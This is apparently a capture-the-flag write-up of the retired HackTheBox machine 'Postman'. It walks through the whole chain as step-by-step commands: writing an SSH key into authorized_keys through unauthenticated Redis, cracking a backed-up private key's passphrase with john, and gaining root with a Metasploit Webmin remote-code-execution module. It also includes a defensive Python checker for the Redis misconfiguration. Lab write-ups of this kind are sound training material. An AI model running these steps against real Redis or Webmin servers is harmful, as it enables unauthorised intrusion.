Postman is a box rated easy on HackTheBox. It just retired, and here's my writeup!

First, let's add the hostname postman to the hosts file so that we don't always need to type in the IP address.

vi /etc/hosts

Hit i (to enter insert mode)

10.10.10.160     postman

[esc]
:x (saving and exiting)

Now, let's run an nmap scan to see what services are running. We will be checking all ports, hence the -p- option.

nmap -A -T4 -p- 10.10.10.160

 SSL - 21
 http - 80
 Miniserv 1.910 - 10000
 redis - 6379

Miniserv at port 10000, that's something that I haven't seen very often. Let's check if it has a webpage.

https://postman:10000/

We can see a Webmin login prompt. Trying admin/admin there doesn't give us anything, and I don't think bruteforce is the name of the game here.

Now, the other interesting service available is redis. To check the redis port:

apt-get install redis-tools #installing redis command line tools
redis-cli -h postman #connecting to the postman server via redis-cli
 ping #checking the connection
 pong #we get a pong back, that's nice

Now that we know that the connection works fine, let's quit it.

This version of redis has a well-known vulnerability. You can read about it at: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html

As suggested by Packet Storm Security, let's try generating an RSA key and see if that works.

ssh-keygen -t rsa -C "redis@postman"

Create the private/public key pair and save them both at ~/HTB/Postman.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt

Now, let's upload the contents of the test.txt file to the redis server.

cat test.txt | redis-cli -h 10.10.10.160 -x set crackit

The -x option tells redis-cli to read the last argument from STDIN, which in our case is the content of test.txt.

redis-cli -h 10.10.10.160
 config get dir
 config set dbfilename "authorized_keys"
 save
 quit

We saved the contents of our test.txt file as authorized_keys on the server.
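As an added, defensive example (this is not part of the writeup, and none of it is Redis or HackTheBox code), the Python below shows the other side of this step: a small audit of a redis.conf that flags the settings which let an anonymous client run CONFIG SET and SAVE, and a check that spots an authorized_keys file that was written by Redis rather than by an admin (it starts with the RDB magic and carries binary bytes around the key line). The config fragments and the two authorized_keys samples are constructed for the example; the password value is a placeholder.

```python
"""Defensive checks for the "write authorized_keys through Redis SAVE" technique.

Added example, not part of the original writeup. All sample inputs are constructed.
"""
import re

RDB_MAGIC = b"REDIS"  # every RDB snapshot starts with "REDIS" + a 4-digit version, e.g. REDIS0009
KEY_TYPES = (b"ssh-rsa", b"ssh-ed25519", b"ssh-dss", b"ecdsa-sha2-", b"sk-")
NON_PRINTABLE = re.compile(rb"[^\x09\x0a\x0d\x20-\x7e]")


def authorized_keys_findings(data: bytes) -> list:
    """Return human-readable findings for the raw bytes of one authorized_keys file.

    A file produced by Redis SAVE is an RDB dump: RDB magic at offset 0 and binary
    bytes before and after the injected key line. sshd skips lines it cannot parse,
    which is why the trick works, so we flag exactly those leftovers.
    """
    findings = []
    if data.startswith(RDB_MAGIC):
        findings.append("file begins with RDB magic %r" % data[:9])
    if NON_PRINTABLE.search(data):
        findings.append("non-printable bytes present")
    # bytes.splitlines only breaks on \n, \r and \r\n, so binary junk stays on its line
    for lineno, line in enumerate(data.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(b"#"):
            continue  # blank lines and comments are legitimate
        if not any(t in stripped for t in KEY_TYPES):
            findings.append("line %d is neither a comment nor a key: %r" % (lineno, stripped[:20]))
    return findings


def redis_conf_findings(conf: str) -> list:
    """Flag redis.conf settings that expose CONFIG SET / SAVE to unauthenticated clients."""
    settings = {}
    for line in conf.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        settings.setdefault(key.lower(), []).append(value.strip())

    findings = []
    binds = " ".join(settings.get("bind", [])).split()
    if not binds or any(b in ("0.0.0.0", "*") for b in binds):
        findings.append("bind: listens on all interfaces (no bind, 0.0.0.0 or *)")
    if "requirepass" not in settings:
        findings.append("requirepass: no password, any client can run CONFIG SET and SAVE")
    if settings.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no: the safeguard for unbound, passwordless instances is off")
    if not any(v.upper().startswith("CONFIG") for v in settings.get("rename-command", [])):
        findings.append("rename-command: CONFIG is neither renamed nor disabled")
    return findings


# Constructed samples: a config like the one this box appears to run, and a hardened one.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\ndir /var/lib/redis\n"
HARDENED_CONF = (
    "bind 127.0.0.1\n"
    "protected-mode yes\n"
    "requirepass CHANGE-ME-placeholder\n"   # placeholder, not a real password
    'rename-command CONFIG ""\n'            # disables CONFIG entirely
)

# Constructed authorized_keys samples: an admin-written file and an RDB dump carrying a key.
CLEAN_KEYS = (
    b"# constructed sample\n"
    b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyBytesExampleKeyBytesExampleKey user@host\n"
)
DUMPED_KEYS = (
    b"REDIS0009\xfa\tredis-ver\x054.0.9\xfe\x00\x00\x07crackit\x3f"
    b"\n\n\nssh-rsa AAAAB3NzaC1yc2EConstructedSampleKey redis@postman\n\n\n"
    b"\xff\x11\x22\x33\x44\x55\x66\x77\x88"
)

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, "config:", redis_conf_findings(conf) or "no findings")
    for name, keys in (("clean", CLEAN_KEYS), ("dumped", DUMPED_KEYS)):
        print(name, "authorized_keys:", authorized_keys_findings(keys) or "no findings")
```

Running it prints four findings for the weak config and none for the hardened one, and flags the dumped file on its magic, its binary bytes and its two junk lines while passing the clean one. Run the authorized_keys check over every user's ~/.ssh/authorized_keys (including service accounts such as redis) in a host audit, and the config check against /etc/redis/redis.conf in a build or deploy check.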

Now, let's try to log in with the key pair.

ssh -i id_rsa redis@10.10.10.160

You are in!

Got the initial foothold, now time for privesc!

cd /opt/
ls

When you ls there, you should see an id_rsa.bak file.
That's interesting; we should check whether it really is a backup of an id_rsa file, in which case our job will be really easy.

cat id_rsa.bak 

Copy all of it, and in another terminal window on our attacking machine,

vi ~/HTB/Postman/id_rsa.bak

Again, hit i to enter insert mode and paste everything there.
[esc]
:x To save and exit.

Now, we will try to crack the password used with the rsa key.

updatedb #refreshes the locate database

locate ssh2john.py #finds where ssh2john.py file is

cp $(locate ssh2john.py) . #copies the ssh2john.py file from wherever it is to the present working directory

python ssh2john.py id_rsa.bak > id_rsa.bak.hash #converts the key into a format john can use

john id_rsa.bak.hash -wordlist=rockyou.txt #using john with the rockyou.txt wordlist, we try to crack the passphrase

You should get a password, "computer2008".

However, when you try to ssh in, you will be denied.

Now, go back to the window where you are logged in as redis user.

su Matt

Enter the password computer2008.

Boom!

You are user now!

cd ~
cat user.txt

Now, go to the browser and try to log in to Webmin with Matt's credentials (note that the username is Matt, not matt).

So, that works.
Now, logout as Matt user from the terminal and webmin.

Back on your Kali machine,

msfconsole
 search webmin
 use linux/http/webmin_packageup_rce
 options
 set rhosts postman
 set password computer2008
 set username Matt
 set ssl true
 set lhost <your kali machine's ip>
 exploit

And that should work!

Congratulations, you're root now!

cat /root/root.txt

Thank you for reading, feel free to share it if you like it!
- root@abhizer